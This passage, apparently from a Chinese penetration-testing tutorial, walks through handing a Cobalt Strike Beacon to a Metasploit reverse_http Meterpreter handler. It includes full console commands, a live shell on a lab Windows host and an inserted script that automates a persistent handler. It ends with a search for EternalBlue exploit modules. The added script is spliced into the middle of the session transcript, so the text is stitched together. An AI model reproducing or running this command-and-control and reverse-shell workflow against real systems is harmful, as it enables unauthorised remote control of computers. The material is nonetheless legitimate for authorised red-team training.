41 - Penetration Testing Tool Cobalt Strike - 2. CS Basic Usage

3. Combining with Metasploit: reverse shell

In Kali, start Metasploit with the following command:

msfconsole
┌──(root㉿oldboy)-[~]
└─# msfconsole
---
msf6 > use exploit/multi/handler
[*] Using configured payload generic/shell_reverse_tcp
---
msf6 exploit(multi/handler) > show options

Module options (exploit/multi/handler):

   Name  Current Setting  Required  Description
   ----  ---------------  --------  -----------


Payload options (generic/shell_reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST                   yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Wildcard Target

---
msf6 exploit(multi/handler) > set lhost 10.0.0.200
lhost => 10.0.0.200
---

msf6 exploit(multi/handler) > set payload windows/meterpreter/reverse_http
payload => windows/meterpreter/reverse_http
---
msf6 exploit(multi/handler) > set lport 7777
lport => 7777
---

In Cobalt Strike (on the attacker side, not on the target):
Create a foreign listener whose host is the Metasploit address (10.0.0.200) and whose port is the port the handler listens on (7777). The listener type must match the handler's payload: the handler above was set to windows/meterpreter/reverse_http, so use the Foreign HTTP listener type (windows/foreign/reverse_http) rather than windows/foreign/reverse_tcp; a TCP foreign listener will not stage through an HTTP handler. The handler output below, which shows the HTTP stager being served, confirms the HTTP variant is what actually connected here. Then right-click the Beacon, choose Spawn, and select this listener.

Start the attack and establish the session:

msf6 exploit(multi/handler) > run

[*] Started HTTP reverse handler on http://10.0.0.200:7777
[!] http://10.0.0.200:7777 handling request from 10.0.0.101; (UUID: 2sotjla4) Without a database connected that payload UUID tracking will not work!
[*] http://10.0.0.200:7777 handling request from 10.0.0.101; (UUID: 2sotjla4) Staging x86 payload (176220 bytes) ...
[!] http://10.0.0.200:7777 handling request from 10.0.0.101; (UUID: 2sotjla4) Without a database connected that payload UUID tracking will not work!
[*] Meterpreter session 1 opened (10.0.0.200:7777 -> 127.0.0.1) at 2024-05-28 21:41:00 +0800

----
meterpreter > shell
Process 1152 created.
Channel 1 created.
Microsoft Windows [版本 5.2.3790]
(C) 版权所有 1985-2003 Microsoft Corp.

C:\Documents and Settings\Administrator\桌面>ipconfig
ipconfig

Windows IP Configuration


Ethernet adapter 本地连接:

   Connection-specific DNS Suffix  . : 
   IP Address. . . . . . . . . . . . : 10.0.0.101
   Subnet Mask . . . . . . . . . . . : 255.255.255.0
   Default Gateway . . . . . . . . . : 10.0.0.254

C:\Documents and Settings\Administrator\桌面>

If other hosts check in later, spawning them into the msf listener (the one pointing at the handler's port) pushes their sessions to Metasploit as well. Note that a bare `run` uses the handler's default ExitOnSession=true, so the handler stops after the first session; to keep accepting spawned Beacons, set ExitOnSession false and start the handler as a job with `exploit -j`.
With the session in Metasploit we can use its modules for further penetration.

Further penetration:
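The handler setup above is typed into msfconsole by hand. The following script is an added example, not code from the original post: it writes the same handler configuration to a Metasploit resource script, with ExitOnSession disabled and the handler run as a background job so that every Beacon spawned into the foreign listener lands in Metasploit, then launches msfconsole with it. The default LHOST/LPORT are the values used on this page; the resource-script path and the script filename used in the guard at the bottom are assumptions of this example.

```shell
#!/bin/sh
# Added example (not from the original post). Generates a Metasploit
# resource script for the Cobalt Strike foreign-listener handoff and
# launches msfconsole with it.

# Emit the resource-script text for a multi/handler that keeps listening
# after the first session. ExitOnSession=false plus "exploit -j -z" is what
# lets several spawned Beacons arrive over time; the page's bare "run"
# would stop the handler after the first session.
gen_handler_rc() {
    lhost="$1"
    lport="$2"
    cat <<EOF
use exploit/multi/handler
set payload windows/meterpreter/reverse_http
set LHOST ${lhost}
set LPORT ${lport}
set ExitOnSession false
exploit -j -z
EOF
}

# Reject anything that is not a dotted IPv4 address and a port in 1..65535,
# so a typo does not silently start a handler on the wrong endpoint.
validate_endpoint() {
    case "$1" in
        *[!0-9.]*|"") return 1 ;;
    esac
    [ "$2" -ge 1 ] 2>/dev/null && [ "$2" -le 65535 ] 2>/dev/null
}

main() {
    lhost="${1:-10.0.0.200}"                 # Metasploit host from the page
    lport="${2:-7777}"                       # handler port from the page
    rc="${3:-/tmp/cs_foreign_handler.rc}"    # assumed output path
    validate_endpoint "$lhost" "$lport" || { echo "bad LHOST/LPORT" >&2; return 1; }
    gen_handler_rc "$lhost" "$lport" > "$rc"
    echo "wrote $rc"
    # -q suppresses the banner, -r loads the resource script on startup.
    msfconsole -q -r "$rc"
}

# Only run main when executed directly under the assumed filename, so the
# functions can also be sourced from another script.
case "${0##*/}" in
    cs_handler.sh) main "$@" ;;
esac
```

Run it as `sh cs_handler.sh 10.0.0.200 7777`; once the handler job is up, create the Foreign HTTP listener in Cobalt Strike with the same host and port and spawn Beacons into it, then use `sessions` in msfconsole to see each one arrive.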

C:\Documents and Settings\Administrator\桌面>^C
Terminate channel 1? [y/N]  y
--------------------------------------------------
meterpreter > background
[*] Backgrounding session 1...
msf6 exploit(multi/handler) > sessions -i

Active sessions
===============

  Id  Name  Type                     Information                                      Connection
  --  ----  ----                     -----------                                      ----------
  1         meterpreter x86/windows  OLDBOY-F74D04FE\Administrator @ OLDBOY-F74D04FE  10.0.0.200:7777 -> 127.0.0.1 (10.0.0.101)

msf6 exploit(multi/handler) > search ms17-010

Matching Modules
================

   #  Name                                      Disclosure Date  Rank     Check  Description
   -  ----                                      ---------------  ----     -----  -----------
   0  exploit/windows/smb/ms17_010_eternalblue  2017-03-14       average  Yes    MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption
   1  exploit/windows/smb/ms17_010_psexec       2017-03-14       normal   Yes    MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Code Execution
   2  auxiliary/admin/smb/ms17_010_command      2017-03-14       normal   No     MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Command Execution
   3  auxiliary/scanner/smb/smb_ms17_010                         normal   No     MS17-010 SMB RCE Detection
   4  exploit/windows/smb/smb_doublepulsar_rce  2017-04-14       great    Yes    SMB DOUBLEPULSAR Remote Code Execution


Interact with a module by name or index. For example info 4, use 4 or use exploit/windows/smb/smb_doublepulsar_rce                                        

msf6 exploit(multi/handler) > use ...
